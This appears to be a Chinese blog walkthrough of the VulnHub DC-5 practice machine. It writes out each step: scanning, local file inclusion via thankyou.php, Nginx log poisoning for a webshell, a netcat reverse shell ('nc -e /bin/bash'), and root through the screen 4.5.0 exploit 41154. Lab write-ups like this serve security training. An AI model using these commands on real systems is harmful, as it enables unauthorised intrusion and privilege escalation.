VulnHub_DC-5渗透流程
DC-5
主机探测
nmap 192.168.157.0/24
访问网站
探测网站得知是Nginx
目录扫描
在Contact处可以提交东西,抓个包,发现在thankyou.php
界面时间年份会变,应该是调用了别的文件,扫个
dirsearch -u 192.168.157.149
文件包含漏洞
果然,那么肯定存在文件包含,尝试常见的变量file
http://192.168.157.149/thankyou.php?file=/etc/passwd
执行成功
接下来的思路就是传入木马,蚁剑连接
利用Nginx的错误日志,/var/log/nginx/error.log
可以查看是否传入成功
蚁剑反弹shell
传入成功,那直接上蚁剑,url就是http://192.168.157.149/thankyou.php?file=/var/log/nginx/error.log
连接成功,那弹个shell
kali上开启监听
nc -lnvp 9999
蚁剑反弹
nc -e /bin/bash kali的ip 监听端口
在弹个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
提权
查找具有SUID权限的文件
find / -perm -4000 -print 2>/dev/null
查找漏洞,拷贝到当前路径
searchsploit screen 4.5.0
searchsploit -m 41154
也可以用locate
命令查看路径再cp
查看后发现要在/tmp
下运行
将此文件通过蚁剑上传
chmod +x 41154.sh
赋予执行权限
运行得到root权限
得到flag
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通